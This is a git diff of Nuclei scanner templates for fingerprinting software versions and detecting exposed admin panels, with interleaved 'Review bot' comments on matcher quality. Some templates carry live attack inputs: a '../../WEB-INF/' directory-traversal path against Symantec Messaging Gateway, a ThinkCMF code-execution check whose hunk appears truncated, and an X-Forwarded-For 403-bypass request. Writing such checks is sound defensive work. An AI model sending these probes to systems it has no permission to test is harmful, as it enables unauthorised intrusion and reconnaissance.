+ - method: GET + path: + - "{{BaseURL}}/docbook/erd/mantisbt.mwb" + + matchers: + - type: dsl + name: 1.3.0 - 2.22.2 + dsl: + - "(\"8975df5a516b8f4fc136d0f9c80f3190\" == md5(body))" + - type: dsl + name: 1.2.16 - 1.2.20 + dsl: + - "(\"3da5a6c4972d71bd0a668caa4075dcde\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"154ff3f99a2233623932791d81b7ee78\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/images/mantis_logo.png" + + matchers: + - type: dsl + name: 2.0.0 - 2.22.2 + dsl: + - "(\"6f6f731ce54f063ef1020ad6cf8596d3\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"ba46364c699a330ee0aad0013db3054b\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9ae11327423fda16d18ed021fe5c20f1\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/Developers_Guide/en-US/images/erd.png" + + matchers: + - type: dsl + name: 
2.0.0 - 2.22.2 + dsl: + - "(\"d9460141201a54306db72cd90af55e54\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.20 + dsl: + - "(\"dd897750b824fa9a6d20a8570a3adfcd\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"95892b78ac6207b750c73086f46eb260\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_slovak.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.14.0 + dsl: + - "(\"13bb5b813f49d7b1c953e8ca82cc9fd7\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"880eb08ac9557c84e0e84bc2da3cfdb4\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"e7561a0f9680b04059fa1864a8f44540\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"63211ef93d5ba4641157a1d3cdf3019c\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"b7e6e60ae726efb4a2799cbdc65f11b0\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"c46c7ac33e6478ea96a3a233fa07bb86\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"1107f5557922743f3ef839720ad7e117\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"2ae2874e5c70c305b3ff240ee06b389c\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"c06d0414457bfd72fd467c0421458d5d\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.22.2 + dsl: + - "(\"c577b0830123ee8dec64c6ebaed42eab\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"09f287797365f34cca61caff6dd0175a\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_polish.txt" + + matchers: + - type: dsl + name: 2.1.0 - 2.14.0 + dsl: + - "(\"72a7a65d3dffbe1c1465e27d17afd3c7\" == md5(body))" + - type: dsl + name: 1.3.0 - 2.0.1 + dsl: + - "(\"f7dde2bb2400d3044b1c170a9b15e2fd\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"844b7915807f385052c19404b6aee472\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - 
"(\"63b1df649c0cc43b707bd37d83056ac2\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"9070a81a3860cda91bd647b7a9c4414c\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"24440f9e75562c75854cb3dec421844a\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"8c271f6d635a66820fba7358e74ee33f\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"4e6a9f3255284a3a398bbe3878c9ce07\" == md5(body))" + - type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"2d8583373de9434e6701af4ec5395536\" == md5(body))" + - type: dsl + name: 2.15.0 - 2.22.2 + dsl: + - "(\"64695fb96a5582dc38de8fb9586dbcc9\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"e69f68bfe320cb27894f3cf020c488c5\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/MantisGraph/lang/strings_hungarian.txt" + + matchers: + - type: dsl + name: 2.5.0 - 2.7.1 + dsl: + - "(\"b523d34ccf363556823116a0ded8c153\" == md5(body))" + - type: dsl + name: 2.1.0 - 2.4.2 + dsl: + - "(\"f3432b8202f5a6c7aca7d1a303c35fc7\" == md5(body))" + - type: dsl + name: 1.3.4 - 2.0.1 + dsl: + - "(\"9a28f8309b33edecf3b0ed44b5d7ef36\" == md5(body))" + - type: dsl + name: 1.3.2 - 1.3.3 + dsl: + - "(\"39f5b8b3fe14b08a6583e854e63c0f73\" == md5(body))" + - type: dsl + name: 1.3.0 - 1.3.1 + dsl: + - "(\"d8dc28990c4f0c826fcdeea101db591c\" == md5(body))" + - type: dsl + name: 1.2.9 - 1.2.10 + dsl: + - "(\"68f5eea154db319a1febd86814be049c\" == md5(body))" + - type: dsl + name: 1.2.5 - 1.2.8 + dsl: + - "(\"e321ad2f21ffba70a129caa49b3894ce\" == md5(body))" + - type: dsl + name: 1.2.2 - 1.2.4 + dsl: + - "(\"880c1459ee7ba1d06b1797fdf24a4691\" == md5(body))" + - type: dsl + name: 1.2.17 - 1.2.20 + dsl: + - "(\"1f0a8ea65e67bd7473c012fa1e838d12\" == md5(body))" + - type: dsl + name: 1.2.13 - 1.2.16 + dsl: + - "(\"0b0be170286e139de0d2258e0af308a3\" == md5(body))" + - type: dsl + name: 1.2.11 - 1.2.12 + dsl: + - "(\"5e3b384c113f530fc95de022c7aeb0a0\" == md5(body))" + - 
type: dsl + name: 1.2.0 - 1.2.1 + dsl: + - "(\"84df7a1bdf2d899dbd342841bd8786e9\" == md5(body))" + - type: dsl + name: 2.8.0 - 2.20.1 + dsl: + - "(\"3aa3f6259ab4a3af876b9a79bcc00310\" == md5(body))" + - type: dsl + name: 2.21.0 - 2.22.2 + dsl: + - "(\"3321c1237634403d951c0a028b0514ea\" == md5(body))" + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1fa392b019dabfb85ebc7c6e031f6a7f\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/moment-with-locales-2.24.0.min.js" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1b1c80b617bfcaf8c0766d41c4a3c680\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/js/typeahead.jquery-1.3.0.min.js" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"886daa0d33625c72b849bf22026760e2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/docbook/erd/mantisbt_2.23.0_210_erd_r2.pdf" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"9b30d03c663b6527bfd2d64ea7cdd2f2\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_en-gb.txt" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"1b1eb129b788a5b5cff40440b81e3ac8\" == md5(body))" + + - method: GET + path: + - "{{BaseURL}}/plugins/Gravatar/lang/strings_turkish.txt" + + matchers: + - type: dsl + name: 2.23.0 - 2.24.3 + dsl: + - "(\"6b1977e601866164743de96b0f743bbd\" == md5(body))" diff --git a/poc/other/sitecore-version-10292.yaml b/poc/other/sitecore-version-10292.yaml index 86162259c6..5cb93e5c4e 100644 --- a/poc/other/sitecore-version-10292.yaml +++ b/poc/other/sitecore-version-10292.yaml 
@@ -1,25 +1,50 @@ id: sitecore-version + info: name: Sitecore version detection author: bernardofsr severity: info + reference: + - https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html + metadata: + max-request: 1 tags: sitecore,tech - reference: https://www.cvedetails.com/vulnerability-list/vendor_id-9609/Sitecore.html -requests: + +http: - method: GET path: - "{{BaseURL}}/sitecore/shell/sitecore.version.xml" + matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - "Sitecore Corporation" part: body + extractors: - type: regex group: 1 regex: - "([0-9]+)" + + - type: regex + group: 1 + regex: + - "([0-9]+)" + + - type: regex + group: 1 + regex: + - "([0-9]+)" + + - type: regex + group: 1 + regex: + - "([0-9]+)" + +# digest: 4a0a0047304502210088716c595b77a89f541e7eccb401ec7a791f8be721a53410bec7c04ec13dadb70220659bc8c9488c0c78b0bbc20b4c5bcfdd3e90c0bb24342aff2d9439af166bf213:922c64590222798bb761d5b6d8e72950 diff --git a/poc/other/sitecore-workflow-10293.yaml b/poc/other/sitecore-workflow-10293.yaml index 2dc2a27e36..cfeab5b32a 100644 --- a/poc/other/sitecore-workflow-10293.yaml +++ b/poc/other/sitecore-workflow-10293.yaml @@ -6,6 +6,8 @@ info: description: A simple workflow that runs all SiteCore related nuclei templates on a given target. workflows: - - template: technologies/default-sitecore-page.yaml + - template: technologies/sitecore-default-page.yaml + - template: exposed-panels/sitecore-login.yaml subtemplates: - - tags: sitecore \ No newline at end of file + - tags: vulnerabilities/sitecore-pre-auth-rce.yaml + - template: misconfiguration/sitecore-debug-page.yaml \ No newline at end of file diff --git a/poc/other/skycaiji-admin-panel-10306.yaml b/poc/other/skycaiji-admin-panel-10306.yaml index e83c2814df..8a3839310e 100644 --- a/poc/other/skycaiji-admin-panel-10306.yaml +++ b/poc/other/skycaiji-admin-panel-10306.yaml 
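Review bot: The `extractors` list on the new side repeats the same entry (`type: regex`, `group: 1`, `([0-9]+)`) four times. The three copies add no information and look like a merge artefact, so keep a single extractor. The pattern `([0-9]+)` captures only the first run of digits in the body, not a dotted version string; confirm it against a real `sitecore.version.xml` response before using the output for version triage. The trailing `# digest:` line is presumably a signature over the template text, so check that it still verifies after this edit.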
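Review bot: Under `subtemplates`, the entry `- tags: vulnerabilities/sitecore-pre-auth-rce.yaml` puts a template path in the `tags` key. It would be read as a tag name that presumably matches nothing, so that check is silently skipped. It should read `- template: vulnerabilities/sitecore-pre-auth-rce.yaml`. The hunk also replaces `- tags: sitecore`, so templates selected only by that tag no longer run from this workflow; confirm this is intended.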
@@ -3,7 +3,7 @@ info: name: SkyCaiji Admin Panel author: princechaddha severity: info - tags: panel,tech,skycaiji + tags: panel,tech requests: - method: GET path: diff --git a/poc/other/skycaiji-install.yaml b/poc/other/skycaiji-install.yaml index b88e58204b..21aee2952f 100644 --- a/poc/other/skycaiji-install.yaml +++ b/poc/other/skycaiji-install.yaml @@ -1,9 +1,8 @@ id: skycaiji-install info: - name: SkyCaiji - Exposed Installation + name: SkyCaiji Exposed Installation author: pikpikcu severity: high - description: SkyCaiji was discovered. tags: tech,skycaiji,exposure,misconfig requests: - method: GET @@ -21,5 +20,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/07/21 diff --git a/poc/other/solr-query-dashboard.yaml b/poc/other/solr-query-dashboard.yaml index bd062e78f8..f1cd3dea51 100644 --- a/poc/other/solr-query-dashboard.yaml +++ b/poc/other/solr-query-dashboard.yaml @@ -1,20 +1,28 @@ id: solr-admin-query + info: - name: Solr Admin Query Page + name: Solr - Admin Page Access author: dhiyaneshDK - severity: High - reference: https://www.exploit-db.com/ghdb/5856 + severity: high + description: Solr's admin page was able to be accessed with no authentication requirements in place. + reference: + - https://www.exploit-db.com/ghdb/5856 tags: solr,unauth + requests: - method: GET path: - '{{BaseURL}}/admin/' - '{{BaseURL}}/solr/admin/' + matchers-condition: and matchers: - type: word words: - 'Solr admin page' + - type: status status: - 200 + +# Enhanced by mp on 2022/07/21 diff --git a/poc/other/sonarqube-public-projects.yaml b/poc/other/sonarqube-public-projects.yaml index f2f5e5dbf1..a2aad16212 100644 --- a/poc/other/sonarqube-public-projects.yaml +++ b/poc/other/sonarqube-public-projects.yaml 
@@ -3,9 +3,8 @@ info: name: Sonarqube with public projects author: sickwell severity: low - reference: - - https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true tags: sonarqube,misconfig + reference: https://next.sonarqube.com/sonarqube/web_api/api/components/suggestions?internal=true requests: - method: GET path: diff --git a/poc/other/sonicwall-management-panel-10387.yaml b/poc/other/sonicwall-management-panel-10387.yaml index 67b123d0cf..4af9aae59d 100644 --- a/poc/other/sonicwall-management-panel-10387.yaml +++ b/poc/other/sonicwall-management-panel-10387.yaml @@ -1,9 +1,11 @@ id: sonicwall-management-panel + info: name: SonicWall Management Panel author: PR3R00T severity: info - tags: panel + tags: panel,sonicwall + requests: - method: GET path: diff --git a/poc/other/spoofable-spf-records-ptr-10426.yaml b/poc/other/spoofable-spf-records-ptr-10426.yaml index 993131749a..60c285c7b4 100644 --- a/poc/other/spoofable-spf-records-ptr-10426.yaml +++ b/poc/other/spoofable-spf-records-ptr-10426.yaml @@ -1,22 +1,18 @@ id: spoofable-spf-records-ptr info: - name: Spoofable SPF Records with PTR Mechanism + name: Find spoofable SPF records containing the PTR mechanism author: binaryfigments severity: info - description: SPF records in DNS containing a PTR mechanism are spoofable. - reference: - - https://www.digitalocean.com/community/tutorials/how-to-use-an-spf-record-to-prevent-spoofing-improve-e-mail-reliability - classification: - cwe-id: CWE-200 - tags: dns,spf + description: Check if TXT records in DNS for SPF records that have the PTR mechanism that is spoofable. dns: - name: "{{FQDN}}" type: TXT + class: inet + recursion: true + retries: 3 matchers: - type: word words: - "v=spf1" - " ptr " condition: and - -# Enhanced by mp on 2022/03/14 diff --git a/poc/other/sugarcrm-panel-10569.yaml b/poc/other/sugarcrm-panel-10569.yaml index b631adf067..c76645fdf8 100644 --- a/poc/other/sugarcrm-panel-10569.yaml 
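Review bot: In `spoofable-spf-records-ptr-10426.yaml`, the word matcher `" ptr "` only fires when the mechanism has a space on both sides. Records that use the `ptr:<domain>` form, a qualifier such as `~ptr`, or `ptr` as the last term are not reported, and the domain owner gets a false all-clear. A regex matcher such as `'(^|\s)[+?~-]?ptr(:\S+)?(\s|$)'`, combined with the existing `v=spf1` word check, would cover those forms. The new `info` block also drops `tags: dns,spf`, so tag-based runs no longer select this template; keep the tags unless that is deliberate.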
+++ b/poc/other/sugarcrm-panel-10569.yaml @@ -1,15 +1,19 @@ id: sugarcrm-panel + info: name: Detect SugarCRM Panel author: johnk3r severity: info - reference: https://www.shodan.io/search?query=sugarcrm + metadata: + shodan-query: http.title:sugarcrm tags: sugarcrm,panel + requests: - method: GET path: - "{{BaseURL}}" - "{{BaseURL}}/index.php?action=Login&module=Users" + stop-at-first-match: true matchers-condition: and matchers: @@ -17,6 +21,7 @@ requests: part: body words: - "SugarCRM" + - type: status status: - 200 diff --git a/poc/other/supervpn-panel-10575.yaml b/poc/other/supervpn-panel-10575.yaml index acc35a15e9..7b42b90a1d 100644 --- a/poc/other/supervpn-panel-10575.yaml +++ b/poc/other/supervpn-panel-10575.yaml @@ -3,6 +3,7 @@ info: name: SuperVPN panel detect author: organiccrap severity: info + tags: panel requests: - method: GET path: diff --git a/poc/other/supervpn-panel.yaml b/poc/other/supervpn-panel.yaml index acc35a15e9..017194340c 100644 --- a/poc/other/supervpn-panel.yaml +++ b/poc/other/supervpn-panel.yaml @@ -1,8 +1,10 @@ id: supervpn-detect + info: name: SuperVPN panel detect author: organiccrap severity: info + requests: - method: GET path: diff --git a/poc/other/symantec-messaging-gateway-10609.yaml b/poc/other/symantec-messaging-gateway-10609.yaml index 72a8c40af6..ab5c216ab1 100644 --- a/poc/other/symantec-messaging-gateway-10609.yaml +++ b/poc/other/symantec-messaging-gateway-10609.yaml @@ -1,19 +1,23 @@ id: symantec-messaging-gateway + info: name: Symantec Messaging Gateway LFI - author: Random-Robbie + author: Random_Robbie severity: medium description: Symantec Messaging Gateway <= 10.6.1 Directory Traversal - tags: lfi + tags: lfi,messaging,symantec + requests: - method: GET path: - "{{BaseURL}}/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/" + matchers-condition: and matchers: - type: word words: - "struts-default.xml" + - type: status status: - 200 
diff --git a/poc/other/tectuus-scada-monitor.yaml b/poc/other/tectuus-scada-monitor.yaml index 65164a60b4..ef44c69a43 100644 --- a/poc/other/tectuus-scada-monitor.yaml +++ b/poc/other/tectuus-scada-monitor.yaml @@ -2,9 +2,9 @@ id: tectuus-scada-monitor info: name: Tectuus SCADA Monitor - reference: https://www.tectuus.mx/ author: geeknik severity: info + reference: https://www.tectuus.mx/ tags: panel,tectuus,scada requests: @@ -12,17 +12,13 @@ requests: path: - "{{BaseURL}}" - redirects: true matchers-condition: and matchers: - type: status status: - 200 + - type: word words: - - "SCADmonitor" - "SCADAmonitor" - condition: or - - type: word - words: - - "SCADAmonitor y su logo son propiedad de tectuus®" + part: body diff --git a/poc/other/teradici-pcoip-10704.yaml b/poc/other/teradici-pcoip-10704.yaml index d545818f79..72f8e4d980 100644 --- a/poc/other/teradici-pcoip-10704.yaml +++ b/poc/other/teradici-pcoip-10704.yaml @@ -3,11 +3,6 @@ info: name: Teradici PCoIP Detection author: pdteam severity: info - description: Teradici PColP was detected. - reference: - - https://www.teradici.com/ - classification: - cwe-id: CWE-200 tags: tech,pcoip requests: - method: GET @@ -22,5 +17,3 @@ requests: group: 1 regex: - 'PCoIP Connection Manager\/([0-9.]+)\.' - -# Enhanced by mp on 2022/03/24 diff --git a/poc/other/thinkcmf-arbitrary-code-execution.yaml b/poc/other/thinkcmf-arbitrary-code-execution.yaml index b35db666c5..8c39496bf3 100644 --- a/poc/other/thinkcmf-arbitrary-code-execution.yaml +++ b/poc/other/thinkcmf-arbitrary-code-execution.yaml @@ -1,17 +1,14 @@ id: thinkcmf-arbitrary-code-execution - info: name: ThinkCMF Arbitrary code execution author: pikpikcu severity: high reference: https://www.shuzhiduo.com/A/l1dygr36Je/ tags: thinkcmf - requests: - method: GET path: - "{{BaseURL}}/index.php?g=g&m=Door&a=index&content=" part: body condition: and - extractors: - type: regex name: model 
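Review bot: The second `tectuus-scada-monitor.yaml` hunk reduces the body check to the single word `SCADAmonitor`, where the old side also required the ownership string in a separate matcher. Any page that mentions that word and returns 200 will now be inventoried as this SCADA panel. Keep a second product-specific string under the same matcher with `condition: and`, so asset lists built from this template stay reliable. Removing `redirects: true` also means a root URL that answers with a redirect is never followed and fails the `status: 200` check, so confirm that loss of coverage is acceptable.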
diff --git a/poc/other/ups-status-10984.yaml b/poc/other/ups-status-10984.yaml index 33349641e0..481f53a7e8 100644 --- a/poc/other/ups-status-10984.yaml +++ b/poc/other/ups-status-10984.yaml @@ -1,20 +1,24 @@ id: ups-status + info: name: Multimon UPS status page author: dhiyaneshDK severity: low reference: https://www.exploit-db.com/ghdb/752 tags: logs,status + requests: - method: GET path: - "{{BaseURL}}/cgi-bin/apcupsd/multimon.cgi" - "{{BaseURL}}/cgi-bin/multimon.cgi" + matchers-condition: and matchers: - type: word words: - "Multimon: UPS Status Page" + - type: status status: - 200 diff --git a/poc/other/voipmonitor-workflow.yaml b/poc/other/voipmonitor-workflow.yaml index 3082fdc3f2..a007c4a27c 100644 --- a/poc/other/voipmonitor-workflow.yaml +++ b/poc/other/voipmonitor-workflow.yaml @@ -6,6 +6,6 @@ info: description: A simple workflow that runs all VoipMonitor related nuclei templates on a given target. workflows: - - template: technologies/voipmonitor-detect.yaml + - template: exposed-panels/voipmonitor-panel.yaml subtemplates: - tags: voipmonitor diff --git a/poc/other/wago-plc-panel.yaml b/poc/other/wago-plc-panel.yaml index 5335aaa161..849ddd5515 100644 --- a/poc/other/wago-plc-panel.yaml +++ b/poc/other/wago-plc-panel.yaml @@ -3,7 +3,7 @@ info: name: WAGO PLC Panel author: github.com/its0x08 severity: info - tags: panel,wago + tags: panel requests: - method: GET path: diff --git a/poc/other/wazuh-panel.yaml b/poc/other/wazuh-panel.yaml index fb26c6e3a6..51f8a0dd93 100644 --- a/poc/other/wazuh-panel.yaml +++ b/poc/other/wazuh-panel.yaml @@ -1,5 +1,4 @@ id: wazuh-panel - info: name: Wazuh Login Panel author: cyllective,daffainfo @@ -10,12 +9,10 @@ info: metadata: shodan-query: http.title:"Wazuh" tags: panel,wazuh,login - requests: - method: GET path: - "{{BaseURL}}/app/login" - matchers-condition: and matchers: - type: word 
@@ -26,14 +23,12 @@ requests: - '"icon":"plugins/wazuh/img/icon_blue.png"' - '"url":"/app/wazuh"' condition: or - - type: status status: - 200 - extractors: - type: regex part: body group: 1 regex: - - '"version":"([0-9.]+)"' \ No newline at end of file + - '"version":"([0-9.]+)"' diff --git a/poc/other/weatherlink-11115.yaml b/poc/other/weatherlink-11115.yaml index 3f9d994189..61a45448ca 100644 --- a/poc/other/weatherlink-11115.yaml +++ b/poc/other/weatherlink-11115.yaml @@ -1,17 +1,15 @@ id: weatherlink-configuration - info: name: WeatherLinkIP Configuration author: dhiyaneshDK severity: info - reference: https://www.exploit-db.com/ghdb/6007 + reference: + - https://www.exploit-db.com/ghdb/6007 tags: panel - requests: - method: GET path: - '{{BaseURL}}' - matchers-condition: and matchers: - type: word diff --git a/poc/other/workspace-one-uem-11393.yaml b/poc/other/workspace-one-uem-11393.yaml index 73a1bf2608..fe79a85764 100644 --- a/poc/other/workspace-one-uem-11393.yaml +++ b/poc/other/workspace-one-uem-11393.yaml @@ -3,8 +3,7 @@ info: name: Workspace ONE UEM AirWatch Login Page author: gevakun severity: info - reference: - - https://twitter.com/Jhaddix/status/1295861505963909120 + reference: https://twitter.com/Jhaddix/status/1295861505963909120 tags: panel,workspaceone,login requests: - method: GET diff --git a/poc/other/wso2-management-console.yaml b/poc/other/wso2-management-console.yaml index 2738846f21..9e7e825f86 100644 --- a/poc/other/wso2-management-console.yaml +++ b/poc/other/wso2-management-console.yaml @@ -4,7 +4,7 @@ info: author: dhiyaneshDK severity: info reference: https://www.exploit-db.com/ghdb/5691 - tags: panel + tags: panel,wso2 requests: - method: GET path: diff --git a/poc/other/xds-amr-status.yaml b/poc/other/xds-amr-status.yaml index 6055599dcf..a7f548a112 100644 --- a/poc/other/xds-amr-status.yaml +++ b/poc/other/xds-amr-status.yaml 
@@ -1,26 +1,31 @@ -id: xds-amr-status -info: - name: XDS-AMR - status - author: pussycat0x - severity: info - metadata: - shodan-dork: 'http.title:"XDS-AMR - status"' - tags: panel,tech,xamr,xds -requests: - - method: GET - path: - - "{{BaseURL}}/login.php" - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'XDS-AMR - Status' - - type: status - status: - - 200 - extractors: - - type: regex - part: body - regex: - - 'XAMR\-([0-9]+)' +id: xds-amr-status + +info: + name: XDS-AMR - status + author: pussycat0x + severity: info + metadata: + shodan-dork: 'http.title:"XDS-AMR - status"' + tags: panel,tech,xamr,xds + +requests: + - method: GET + path: + - "{{BaseURL}}/login.php" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'XDS-AMR - Status' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + regex: + - 'XAMR\-([0-9]+)' diff --git a/poc/other/xff-403-bypass-11685.yaml b/poc/other/xff-403-bypass-11685.yaml index 61a9f441c8..7d54a12b98 100644 --- a/poc/other/xff-403-bypass-11685.yaml +++ b/poc/other/xff-403-bypass-11685.yaml 
@@ -1,35 +1,42 @@ id: xff-403-bypass - info: name: X-Forwarded-For 403-forbidden bypass author: vavkamil severity: info description: Template to detect 403 forbidden endpoint bypass behind Nginx/Apache proxy & load balancers, based on X-Forwarded-For header. - tags: fuzz - + tags: xff,bypass,fuzz requests: - raw: - | GET / HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close Accept: */* - + Accept-Language: en + Accept-Encoding: gzip - | GET / HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close Accept: */* + Accept-Language: en + Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - - | GET /test.txt HTTP/1.1 Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 + Connection: close Accept: */* + Accept-Language: en + Accept-Encoding: gzip X-Forwarded-For: 127.0.0.1, 0.0.0.0, 192.168.0.1, 10.0.0.1, 172.16.0.1 - req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 403 && status_code_2 != 403" - "status_code_1 == 403 && status_code_3 != 403" - condition: or \ No newline at end of file + condition: or diff --git a/poc/other/xxljob-panel.yaml b/poc/other/xxljob-panel.yaml index ba4161b984..3fd00d6650 100644 --- a/poc/other/xxljob-panel.yaml +++ b/poc/other/xxljob-panel.yaml @@ -1,22 +1,27 @@ id: xxljob-panel + info: name: XXLJOB Admin Login Panel author: pdteam,daffainfo severity: info tags: panel,xxljob,login + requests: - method: GET path: - "{{BaseURL}}/xxl-job-admin/toLogin" + matchers-condition: and matchers: - type: word part: body words: - "XXLJOB" + - type: status status: - 200 + extractors: - type: regex part: body diff --git a/poc/other/yopass-panel.yaml b/poc/other/yopass-panel.yaml index 27e0187e51..9b8380aba9 100644 --- a/poc/other/yopass-panel.yaml +++ b/poc/other/yopass-panel.yaml 
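Review bot: The DSL expressions `status_code_1 == 403 && status_code_2 != 403` and `status_code_1 == 403 && status_code_3 != 403` treat any non-403 answer as a finding. A 404 for `/test.txt`, a 5xx or a rate-limit response on the second or third request is therefore reported as an access-control weakness. Comparing against an explicit success code, for example `status_code_2 == 200`, would keep the result meaningful for whoever has to fix the proxy configuration. The five header lines added to each raw request are identical and pin a dated `User-Agent`; a comment explaining why the scanner default is overridden would help maintainers.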
@@ -3,9 +3,9 @@ info: name: Yopass Application Exposure author: Adam Crosser severity: info - metadata: - shodan-query: title:"Yopass" tags: panel,yopass + metadata: + shodan-query: 'title:"Yopass"' requests: - method: GET path: diff --git a/poc/other/zabbix-dashboards-access.yaml b/poc/other/zabbix-dashboards-access.yaml index 3177c353c9..2d199e9b32 100644 --- a/poc/other/zabbix-dashboards-access.yaml +++ b/poc/other/zabbix-dashboards-access.yaml @@ -3,10 +3,14 @@ info: name: zabbix-dashboards-access author: pussycat0x,vsh00t severity: medium - description: View dashboard with guest login. + description: zabbix-dashboards-access guest login credentials were successful. reference: - https://www.exploit-db.com/ghdb/5595 - https://packetstormsecurity.com/files/163657/zabbix5x-sqlxss.txt + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 tags: zabbix,unauth requests: - method: GET @@ -22,3 +26,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/04/14 diff --git a/poc/other/zte-panel-11841.yaml b/poc/other/zte-panel-11841.yaml index 2c56774979..efaad36a63 100644 --- a/poc/other/zte-panel-11841.yaml +++ b/poc/other/zte-panel-11841.yaml 
@@ -1,34 +1,24 @@ id: zte-panel + info: name: ZTE Panel - author: its0x08,idealphase + author: github.com/its0x08 severity: info - description: | - ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe.ZTE Corporation is a global leader in telecommunications and information technology. Founded in 1985 and listed on both the Hong Kong and Shenzhen Stock Exchanges, the company has been committed to providing innovative technologies and integrated solutions for global operators, government and enterprise, and consumers from over 160 countries across the globe. - reference: - - https://www.zte.com.cn/global/ - metadata: - verified: true - shodan-query: http.html:"ZTE Corporation" tags: panel,zte + requests: - method: GET path: - "{{BaseURL}}" matchers: - type: word - part: body words: - "ZTE Corporation. All rights reserved. " - '
' + part: body condition: and + - type: word - part: header words: - "Mini web server 1.0 ZTE corp 2005." - extractors: - - type: regex - part: body - group: 1 - regex: - - '
(.+)<\/font><\/div>' + part: header diff --git a/poc/other/zuul-panel-11843.yaml b/poc/other/zuul-panel-11843.yaml index 59636f8546..66226c1746 100644 --- a/poc/other/zuul-panel-11843.yaml +++ b/poc/other/zuul-panel-11843.yaml @@ -1,41 +1,27 @@ id: zuul-panel info: - name: Zuul Panel - Detect + name: Zuul Panel author: Yuzhe-zhang-0 severity: info - description: ZUUL panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 - reference: - - https://opendev.org/zuul/zuul - metadata: - shodan-query: http.favicon.hash:-1127895693 - tags: panel,zuul,cicd,oss + reference: https://www.shodan.io/search?query=http.title%3A%22zuul%22+http.favicon.hash%3A-1127895693 + tags: panel,Zuul,cicd requests: - method: GET + redirects: true + max-redirects: 5 path: - - '{{BaseURL}}/api/tenants' - '{{BaseURL}}/api/status' + - '{{BaseURL}}/api/tenants' - host-redirects: true - max-redirects: 2 - stop-at-first-match: true - matchers-condition: or matchers: - type: word - part: body words: - - '"name":' - - '"projects":' - - '"queue":' - condition: and + - 'zuul_version' - type: word words: - - 'zuul_version' - -# Enhanced by mp on 2023/01/29 + - 'name' + - 'projects' + - 'queue' diff --git a/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml b/poc/php/nuuo-nvrmini2-upgradehandlephp-rce.yaml index afbef78823..2db9a198f3 100644 --- 